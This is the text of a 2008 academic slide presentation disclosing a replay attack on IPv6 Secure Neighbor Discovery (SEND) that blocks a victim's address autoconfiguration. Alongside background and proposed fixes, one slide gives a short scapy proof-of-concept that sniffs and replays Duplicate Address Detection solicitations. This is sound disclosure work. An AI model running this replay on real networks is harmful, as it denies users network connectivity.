Une attaque par rejeu sur le protocole SEND Tony Cheneau mail: - - PowerPoint PPT Presentation

Une attaque par rejeu sur le protocole SEND

Tony Cheneau

mail: tony.cheneau@it-sudparis.eu

(Télécom SudParis) & Jean-Michel Combes

mail: jeanmichel.combes@orange-ftgroup.com

(FT R&D)

October 17, 2008 SAR-SSI'2008

October 19, 2008 Tony Cheneau & Jean-Michel Combes 2

Summary

• Quick IPv6 Introduction
• Neighbor Discovery Protocol
• Attacks on the Neighbor Discovery Protocol
• Crytographically Generated Addresses
• Secure Neighbor Discovery Protocol
• The attack on the SEND protocol
• Solutions to mitigate/avoid the attack
• Conclusion

October 19, 2008 Tony Cheneau & Jean-Michel Combes 3

Quick IPv6 introduction (1/3)

Facts everyone knows:

• 2128 addresses available
• Less work on routers
• Stateless Address Autoconfiguration

October 19, 2008 Tony Cheneau & Jean-Michel Combes 4

Quick IPv6 introduction (2/3)

How to compute a IPv6 address ?

October 19, 2008 Tony Cheneau & Jean-Michel Combes 5

Quick IPv6 introduction (3/3)

October 19, 2008 Tony Cheneau & Jean-Michel Combes 6

Neighbor Discovery Protocol (1/4)

• NDP offers:

– Router Discovery – Prefix Discovery – Parameter Discovery – Stateless Address Autoconfiguration – Address Resolution (similar to ARP in IPv4) – Next Hop Determination – Neighbor Unreachability Detection – Duplicate Address Detection (useful for Stateless

Autoconfiguration, also called DAD)

– Redirection (equivalent to ICMPv4 redirect)

October 19, 2008 Tony Cheneau & Jean-Michel Combes 7

Neighbor Discovery Protocol (2/4)

• 5 types of messages:

– Neighbour Solicitation (NS) – Neighbour Advertisement (NA) – Router Solicitation – Router Advertisement – Redirect

October 19, 2008 Tony Cheneau & Jean-Michel Combes 8

Neighbor Discovery Protocol (3/4)

Address Resolution

October 19, 2008 Tony Cheneau & Jean-Michel Combes 9

Neighbor Discovery Protocol (4/4)

Failure when:

• a node already posses the

address

• a node is willing to obtain the

same address

Success when:

• no node currently owns the

address

Duplicate Address Detection

October 19, 2008 Tony Cheneau & Jean-Michel Combes 10

Attacks on the Neighbor Discovery Protocol

3 kind of attacks:

• routing related
• not routing related

– Neighbor Solicitation/Advertisement Spoofing – Neighbor Unreachability Detection Failure – Duplicate Address Detection DoS Attack

• replay attacks (not really useful) or attacks
• utside a network (much more interesting)

October 19, 2008 Tony Cheneau & Jean-Michel Combes 11

Cryptographically Generated Addresses (1/3)

• Main principles:

– bind a public key to an IPv6 address with an hash

algorithm (but this everybody can do it)

– the public key can be generated on connection – and so does the CGA (it allows autoconfiguration)

• Details:

– a whole set of parameters is bound to the address

October 19, 2008 Tony Cheneau & Jean-Michel Combes 12

Cryptographically Generated Addresses (2/3)

CGA parameter structure:

• a part of the Hash of

this structure will form the interface identifier

• this structure will also

be used in SEND

October 19, 2008 Tony Cheneau & Jean-Michel Combes 13

Cryptographically Generated Addresses (3/3)

October 19, 2008 Tony Cheneau & Jean-Michel Combes 14

Secure Neighbor Discovery Protocol (1/2)

• Rely heavily on CGA
• Secure ICMPv6 message used in the NDP
• Protect against address spoofing
• Introduce option:

– Timestamp (prevent replay attacks) – Nonce (supposedly prevent replay attacks) – CGA option – RSA signature option (actually proves the

• wnership of the address)

October 19, 2008 Tony Cheneau & Jean-Michel Combes 15

Secure Neighbor Discovery Protocol (2/2)

October 19, 2008 Tony Cheneau & Jean-Michel Combes 16

The attack on SEND (1/3)

• Attacker: send back

the NS it receives during victim's DAD process.

• Effect of the attack:

victim's node can't get an address

October 19, 2008 Tony Cheneau & Jean-Michel Combes 17

The attack on SEND (2/3)

• Requirement on the link:

– can listen to the DAD procedure of other nodes:

• hub
• non protected Wireless interface
• ...
• Requirement on the timing of the replay attack:

– packet is replayed within 1 second

October 19, 2008 Tony Cheneau & Jean-Michel Combes 18

The attack on SEND (3/3)

Why does it work ?

• signature option/CGA are correct (only a replay)
• unspecified address as source of the packet
• timestamp is valid, victim compare its own clock
• nonce option has no semantic in this case...

October 19, 2008 Tony Cheneau & Jean-Michel Combes 19

Proof of Concept

Using scapy61:

# network interface on which we will listen packets conf.iface = 'eth0' # listen to an interface sniff (store=0, filter ="ip6" , # listen only to NS used for DAD lfilter = lambda x : x.haslayer(ICMPv6ND_NS) \ and x.getlayer(IPv6).src== " : : " , # replay the packet prn = lambda x : sendp ( x ) , count =0)

1: http://namabiiru.hongo.wide.ad.jp/scapy6/

I would be pleased to know if anyone in this room has a complete implementation of SEND to test this code.

October 19, 2008 Tony Cheneau & Jean-Michel Combes 20

Solutions to mitigate/avoid the attack

• Disable the DAD procedure:

– fairly easy – not backward compatible and not recommended

• Try 3 different address generation and ignore last NS:

– three collision with the same node has low probability – backward compatible

• Give semantic to Nonce option:

– in received NS during a DAD process, Nonce value has to be

different.

– backward compatible – no (known) side effect

October 19, 2008 Tony Cheneau & Jean-Michel Combes 21

Conclusion

• National Institute of Standards and Technology

(NIST) to advise the use of SEND in IPv6 deployment

• New working group reforming in IETF (CSI),

we will advise them to correct the flaw in the next specification

Any questions ?

October 19, 2008 Tony Cheneau & Jean-Michel Combes 22

SEND daemon

Details on NTT Docomo implementation:

October 19, 2008 Tony Cheneau & Jean-Michel Combes 23

SEND Deployment

October 19, 2008 Tony Cheneau & Jean-Michel Combes 24

Certification Path in SEND